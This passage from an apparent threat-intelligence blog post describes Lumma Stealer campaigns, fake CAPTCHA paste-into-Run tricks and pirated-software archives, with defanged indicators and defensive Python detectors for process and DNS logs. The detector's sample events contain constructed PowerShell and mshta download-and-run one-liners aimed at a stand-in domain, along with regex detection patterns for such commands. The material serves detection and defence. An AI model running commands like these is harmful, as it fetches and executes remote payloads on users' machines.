The fake CAPTCHA test asks the user to perform several keyboard commands that look harmless at first glance. It first asks the user to press “Windows + R”, which opens the Run dialog box, a way to launch programs. The next step is to press “CTRL + V” and then Enter. If executed quickly without careful attention, these commands paste a PowerShell script into the Windows Run dialog and run it. This script downloads and installs the Lumma Stealer malware onto the user’s system.

The PowerShell script connects to a remote server to download a Lumma Stealer ZIP archive and executes the setup.
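
The chain above leaves a distinctive trace in endpoint telemetry: a script host whose parent is explorer.exe (the process that owns the Run dialog) with download-and-execute indicators in its command line. As an added example, not SecurityHQ’s detection content, the Python below scores constructed Sysmon-style process-creation lines for exactly that pattern. The key=value event format, the hosts, users and the example.invalid domain are assumptions made for the example.

```python
"""
Spotting the fake-CAPTCHA "Win+R, Ctrl+V, Enter" chain in process telemetry.

Added example, not SecurityHQ's detection content. The lines in
SAMPLE_EVENTS are constructed to imitate Sysmon Event ID 1 (process
creation) fields written as key=value pairs; hosts, users and the
example.invalid domain are invented.
"""
import re
from typing import Dict, List

# The Run dialog belongs to explorer.exe, so a script host whose parent is
# explorer.exe is consistent with a user pasting a command into Win+R.
INTERACTIVE_PARENTS = {"explorer.exe"}

# Script hosts the pasted one-liner is typically executed through.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

# Command-line fragments that point at download-and-execute behaviour.
DOWNLOAD_PATTERNS = {
    "web request": re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|\bcurl\b", re.I),
    "url": re.compile(r"https?://", re.I),
    "hidden window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "archive extraction": re.compile(r"expand-archive|\btar\b", re.I),
    "inline execution": re.compile(r"invoke-expression|\biex\b|mshta", re.I),
}

# key=value pairs; a double-quoted value may contain spaces.
_KV = re.compile(r'(\w+)=("([^"]*)"|\S+)')


def parse_event(line: str) -> Dict[str, str]:
    """Parse one constructed event line into a field dictionary."""
    return {k: (q if raw.startswith('"') else raw) for k, raw, q in _KV.findall(line)}


def image_name(path: str) -> str:
    """Lower-cased file name of an Image/ParentImage path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> List[str]:
    """Reasons the event matches the paste-into-Run chain (empty list = not flagged)."""
    if image_name(event.get("ParentImage", "")) not in INTERACTIVE_PARENTS:
        return []
    if image_name(event.get("Image", "")) not in SCRIPT_HOSTS:
        return []
    cmd = event.get("CommandLine", "")
    reasons = [name for name, rx in DOWNLOAD_PATTERNS.items() if rx.search(cmd)]
    # A script host started from explorer.exe is normal on its own (someone
    # opening a console), so require two independent download/execute signs.
    return reasons if len(reasons) >= 2 else []


def detect(lines: List[str]) -> List[Dict[str, object]]:
    """Run classify() over raw event lines and return one finding per flagged event."""
    findings: List[Dict[str, object]] = []
    for line in lines:
        ev = parse_event(line)
        reasons = classify(ev)
        if reasons:
            findings.append({
                "time": ev.get("UtcTime", ""),
                "user": ev.get("User", ""),
                "image": image_name(ev.get("Image", "")),
                "reasons": reasons,
            })
    return findings


# Constructed telemetry: two events that match the chain, two that do not.
SAMPLE_EVENTS = [
    # Pasted one-liner from the Run dialog: hidden window, download, unzip.
    'UtcTime=2024-10-01T09:12:44Z Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'ParentImage=C:\\Windows\\explorer.exe User=CORP\\jdoe '
    'CommandLine="powershell -w hidden -c iwr http://example.invalid/setup.zip -OutFile $env:TEMP\\s.zip; '
    'Expand-Archive $env:TEMP\\s.zip $env:TEMP\\s"',
    # A user simply opening a PowerShell console from the Run dialog.
    'UtcTime=2024-10-01T09:15:02Z Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'ParentImage=C:\\Windows\\explorer.exe User=CORP\\jdoe CommandLine="powershell"',
    # A deployment agent downloading a package: not an interactive parent.
    'UtcTime=2024-10-01T09:20:10Z Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'ParentImage=C:\\ProgramData\\Deploy\\agent.exe User=CORP\\svc-deploy '
    'CommandLine="powershell -c Invoke-WebRequest https://updates.example.invalid/pkg.msi -OutFile C:\\Temp\\pkg.msi"',
    # Same chain via mshta, which fetches and runs remote script content.
    'UtcTime=2024-10-01T11:03:51Z Image=C:\\Windows\\System32\\mshta.exe '
    'ParentImage=C:\\Windows\\explorer.exe User=CORP\\asmith CommandLine="mshta https://example.invalid/verify"',
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

The two-indicator threshold is the deliberate design choice: a console opened from the Run dialog is everyday behaviour, and a download from a non-interactive parent belongs to a different rule, so the detector flags only the combination the campaign actually produces.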

2. Pirated PC Software Sites

The second campaign leverages pirated PC software sites to spread malicious password-protected ZIP files.

Users are lured into downloading these files, believing they contain free copies of commercial software. Upon extraction and execution of the malicious “Setup.exe”, a Hijack Loader is injected into a Windows binary, initiating the download and execution of the Lumma Stealer.

The malware gathers information such as browser login credentials, stored passwords, and cookies, which are then sent to a Command-and-Control server. It also establishes persistence by creating scheduled tasks and registry entries.

Technical Analysis

Adversaries trick users into downloading malicious password-protected archive files that pose as free copies of commercial software. These copies are hosted on a file-sharing platform. The file is a password-protected archive, with the password provided in the file name.

The extracted ZIP archive contains multiple Dynamic Link Libraries (DLLs) that are used for a DLL sideloading attack. Execution begins when the user extracts the ZIP file and runs the setup binary.

Upon execution, a malicious loader is injected into a Windows binary. Execution of the Hijack Loader results in the download and execution of a binary from the Temp folder which, in turn, performs credential access and maintains sustained network connectivity to the C2 server.

After execution, the malware gathers information such as the computer name and language settings.

Next, it accesses internal files of web browsers (Chrome and Edge) and other browsers installed on the device to collect information such as login data, stored passwords, and cookies.

All collected data is sent to the Command-and-Control Server.

IP Addresses:

  • 184[.]30[.]21[.]171
  • 104[.]26[.]2[.]16
  • 188[.]114[.]96[.]3

Domains/URLs:

  • Predatowpmn[.]shop
  • Fileworld[.]shop
  • pang-scrooge-carnage[.]shop
  • Preachstrwnwjw[.]shop
  • Complainnykso[.]shop
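
To monitor for the indicators above they first have to be refanged (the “[.]” notation is there so the values cannot be clicked), and domain matching has to catch subdomains without matching lookalike names. As an added example that is not SecurityHQ’s tooling, the Python below does that and runs the result over constructed DNS and proxy log lines. The indicator values are the ones listed in this post; the log format, internal addresses and benign domains are invented for the example.

```python
"""
Matching the post's defanged indicators against log data.

Added example, not SecurityHQ's tooling. The indicator values are the ones
listed in this post; the DNS and proxy lines in SAMPLE_LOGS, the internal
addresses and the benign domains are constructed for the example.
"""
import ipaddress
import re
from typing import Dict, List, Optional

DEFANGED_IPS = ["184[.]30[.]21[.]171", "104[.]26[.]2[.]16", "188[.]114[.]96[.]3"]
DEFANGED_DOMAINS = [
    "Predatowpmn[.]shop",
    "Fileworld[.]shop",
    "pang-scrooge-carnage[.]shop",
    "Preachstrwnwjw[.]shop",
    "Complainnykso[.]shop",
]


def refang(indicator: str) -> str:
    """Turn a defanged indicator ('[.]', '(.)', 'hxxp') back into a matchable form."""
    s = indicator.strip().lower()
    for token in ("[.]", "(.)", "[dot]"):
        s = s.replace(token, ".")
    return re.sub(r"^hxxp", "http", s)


IOC_IPS = {ipaddress.ip_address(refang(i)) for i in DEFANGED_IPS}
IOC_DOMAINS = {refang(d) for d in DEFANGED_DOMAINS}


def domain_hit(name: str) -> Optional[str]:
    """Matching IOC domain when name equals it or is a subdomain of it, else None."""
    name = name.lower().rstrip(".")
    for ioc in IOC_DOMAINS:
        # endswith("." + ioc) catches www.fileworld.shop but not notfileworld.shop
        if name == ioc or name.endswith("." + ioc):
            return ioc
    return None


def ip_hit(value: str) -> Optional[str]:
    """Matching IOC address, tolerating an IPv4 ':port' suffix; None if no match."""
    host = value.rsplit(":", 1)[0] if value.count(":") == 1 else value
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return None
    return str(addr) if addr in IOC_IPS else None


# Constructed log format: space-separated key=value fields without quoting.
_KV = re.compile(r"(\w+)=(\S+)")


def scan(lines: List[str]) -> List[Dict[str, str]]:
    """Flag log lines whose query name, host header or destination matches an IOC."""
    hits: List[Dict[str, str]] = []
    for line in lines:
        fields = dict(_KV.findall(line))
        base = {"ts": fields.get("ts", ""), "src": fields.get("src", "")}
        domain = None
        for key in ("qname", "host"):
            domain = domain_hit(fields.get(key, ""))
            if domain:
                break
        if domain:
            hits.append({**base, "indicator": domain, "severity": "high"})
            continue
        ip = ip_hit(fields.get("dst", ""))
        if ip:
            # An address alone is weaker evidence: the post notes these sites are
            # often fronted by CDNs, whose addresses also serve legitimate traffic.
            hits.append({**base, "indicator": ip, "severity": "medium"})
    return hits


# Constructed DNS (qname) and proxy (dst/host) lines; three should be flagged.
SAMPLE_LOGS = [
    "ts=2024-10-02T10:01:05Z src=10.0.4.17 qname=www.fileworld.shop qtype=A",
    "ts=2024-10-02T10:01:06Z src=10.0.4.17 dst=188.114.96.3:443 host=fileworld.shop",
    "ts=2024-10-02T10:02:11Z src=10.0.4.22 qname=updates.example.invalid qtype=A",
    "ts=2024-10-02T10:03:40Z src=10.0.4.31 dst=104.26.2.16:443 host=cdn.example.invalid",
    "ts=2024-10-02T10:04:02Z src=10.0.4.31 qname=notfileworld.shop qtype=A",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print(hit)
```

Domain hits are rated higher than address hits on purpose: a connection to one of the listed addresses with an unrelated Host header is worth a look, but on shared hosting it is far from conclusive on its own.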

Next Steps to Safeguard Against Lumma

  1. Be cautious of suspicious websites, especially those asking for unusual actions such as keyboard commands.
  2. Avoid downloading software from untrusted sources, as it often contains hidden malware.
  3. Monitor the network for the presence of the Indicators of Compromise (IOCs) listed above.
  4. Segment Networks: Divide the computer network into smaller, more isolated segments or subnetworks to limit or block lateral movement.
  5. Deploy EDR: Make sure Endpoint Detection & Response tools have been implemented to detect the latest malware and suspicious activities on endpoints.
  6. Strengthen Email Security: Implement advanced email filtering and security measures to prevent phishing emails and malicious attachments from reaching your employees’ inboxes.
  7. Educate Employees: Raise staff awareness about the risks associated with opening suspicious emails or documents.

For more information about this Malware, how it works, and how to protect against it, contact an expert, here.
